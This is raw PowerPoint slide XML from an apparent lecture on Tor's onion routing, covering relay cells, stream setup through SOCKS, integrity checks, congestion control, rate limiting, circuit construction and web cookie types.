          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>OR receive relay cells, look up the corresponding circuit and decrypts the relay header and payload with the session key for the circuit. Also checks for a valid digest for outer outgoing cells.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>If not valid, the OR finds the circuitID for the next step in the circuit, replaces the appropriate circuitID , and sends the decrypted relay cell to the next OR.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22258083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Opening and Closing Streams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>A user like Alice can obtain a TCP connection via SOCKS	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The Onion Proxy chooses a new open circuit and  suitable or to be an exit node</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The Onion Proxy then sends a relay begin cell to host, the host responds with relay connected cell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The SOCKS relays to notify its success.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The Onion Proxy now accepts data from the TCP stream, which is packaged into relay data cells and passes these to the intended or.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>SOCKS’s weakness is revealing of user destinations if the intended application does DNS resolution first.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7655199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altLang="en-US" dirty="0"/>
              <a:t>Integrity Checking on Streams	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1720968"/>
            <a:ext cx="7886700" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Integrity checks are only done at the edges of each stream(leaky-pipe circuit topology allows a streams edge to be any hop in the circuit)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> The Onion Proxy and the hop initialize a SHA-1 digest with a derivative of the key, then both add to the digest the contents of all relay cells they create.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Each side also keeps a SHA-1 digest of data received , to verify correctness of the hashes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>A cell has four bytes to lower overhead, which leaves an adversary’ chances of guessing a valid hash to very low, also the Onion Proxy OR tear down the circuit if they get a bad hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11341581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dirty="0"/>
              <a:t>Congestion Control in Tor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Congestion Control (circuit-level throttling)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Each OR keeps track of two windows, the packaging window: tracks how many relay data cells allowed to the OR for packaging back to the Onion Proxy. The delivery window: tracks how many relay data cells given to TCP streams outside the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>or after receiving enough data cells, it sends a send me relay to the OR with streamID zero. It then increments the packaging window by 100. If the window reaches 0 the or stops reading from TCP connections for all streams on the corresponding circuit, and stops until another send me relay is received</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Congestion Control (Stream-level throttling)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Similar to circuit level throttling but checks for successful flushed TCP stream, and only sends “send me” relays when flushed under a set threshold by the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24464844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or has two level of congestion conrol (please also refer to the reference link)&#10;&#10;(1) Circuit-level throttling: To control a circuit's bandwidth usage, each OR keeps track of two windows. The packaging window tracks how many relay data cells the OR is allowed to package (from incoming TCP streams) for transmission back to the OP, and the delivery window tracks how many relay data cells it is willing to deliver to TCP streams outside the network. Each window is initialized (say, to 1000 data cells). When a data cell is packaged or delivered, the appropriate window is decremented. When an OR has received enough data cells (currently 100), it sends a relay sendme cell towards the OP, with streamID zero. When an OR receives a relay sendme cell with streamID zero, it increments its packaging window. Either of these cells increments the corresponding window by 100. If the packaging window reaches 0, the OR stops reading from TCP connections for all streams on the corresponding circuit, and sends no more relay data cells until receiving a relay sendme cell. &#10;The OP behaves identically, except that it must track a packaging window and a delivery window for every OR in the circuit. If a packaging window reaches 0, it stops reading from streams destined for that OR.&#10;&#10;(2) Stream-level throttling: The stream-level congestion control mechanism is similar to the circuit-level mechanism. ORs and OPs use relay sendme cells to implement end-to-end flow control for individual streams across circuits. Each stream begins with a packaging window (currently 500 cells), and increments the window by a fixed value (50) upon receiving a relay sendme cell. Rather than always returning a relay sendme cell as soon as enough cells have arrived, the stream-level congestion control also has to check whether data has been successfully flushed onto the TCP stream; it sends the relay sendme cell only when the number of bytes pending to be flushed is under some threshold (currently 10 cells' worth). " title="Congestion Control in Tor"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="976832" y="1477713"/>
            <a:ext cx="6316066" cy="4508179"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="874311" y="5960772"/>
            <a:ext cx="7620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i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://svn.torproject.org/svn/projects/design-paper/tor-design.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="152150"/>
            <a:ext cx="8210550" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Circuit Throttling and Stream Throttling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11540356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06277-7BC8-409F-BCB8-A23A7C15E935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152400"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Rate limiting and fairness</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54898C85-E447-45E9-B27C-2FEF6011520C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Tor uses a token bucket approach to enforce long-term average rate of incoming bytes, while still allowing short-term bursts above the allowed bandwidth to limit bandwidth usage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Tor provides good latency for interactive streams and good overall throughput to the bulk streams by acting as if the entire cell has been read disregarding the cell’s fullness. The local application may be waiting for a reply and this method accommodates this position without waiting for more bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201727735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229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Tor works?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tor works same as Onion Routing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tor takes a random pathway and uses the Diffie-Hellman key exchange.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses Tor Circuits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each circuit is shared my multiple TCP streams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Circuits are created preemptively and can recover from failure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320100592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229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Circuit Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Tor set up circuit incrementally, negotiating a symmetric key with each OR on the circuit, one hop at a time. The procedure includes: (1) the entry point initiate the circuit establishment and include the first OR along the circuit. (2) a Circuit ID is selected randomly. (3) Uisng  Diffie-Hellman key exchange approach, the OP establishs ephemeral session keys with the OR node.  (4) along the pre-selected circuit path, the circuit is extended by including OR nodes and setting up the sessions keys one by one." title="Tor Circuit Setup"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="957512" y="1825625"/>
            <a:ext cx="7228976" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268399386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229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Onion Routing Example – Step (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Different from traditional  Internet routing which is packet oriented (i.e., differents packets send by the sender may take different routes before arriving at the destination ), Tor routing is circuit-oriented: the client proxy will pick a routing path based on the Tor node information. All packets from the client will then be sent through this path. To do that, the client proxy first establish a symmetric session key and a circuit with the Onion Router 1." title="Tor Circuit Setup (1)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141607" y="1481548"/>
            <a:ext cx="6407770" cy="4695415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15532131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Web Cookie Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In-memory cookie, temporarily exists when the user navigates a website, will be deleted when the browser is closed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistent Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be retrieved every time the user revisits the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expires after a specific period</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only transmit over encrypted connection (i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent information theft through eavesdropping </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HttpOnly Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cannot be accessed by client-side APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cross-site scripting (XSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attack, can still be vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cross-site tracing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4275525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Onion router 1 will then extend the tunnel to establish a symmetric session key with between the client proxy and Onion router 2 and 3 accordingly. " title="Tor Circuit Setup (2)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1405054" y="1589569"/>
            <a:ext cx="6099716" cy="4618584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="76200"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Onion Routing Example – Step (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331251573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Once all ORs are included, the circuit setup is completed and the message can be sent." title="Tor Circuit Setup (3)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047547" y="1368449"/>
            <a:ext cx="6657946" cy="4787118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="42886"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Onion Routing Example – Step (3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392920852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229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another Onion Routing Example – Step (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="The user's Onion Proxy (Alice) first obtains a list of Tor nodes from a directory server to discover where on the Internet all the Tor servers are." title="How Tor Works (1)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069354" y="1690689"/>
            <a:ext cx="6648301" cy="4652359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166760291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hen Alice incrementally build a circuit of encrypted connections through Tor servers on the network. The Tor software negotiates a separate set of encryption keys for each hop along the circuit to ensure that each hop cannot trace these connections as they pass through." title="How Tor Works (2)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="837545" y="1481036"/>
            <a:ext cx="7180182" cy="4564020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="155473"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another Onion Routing Example – Step (2)</a:t>
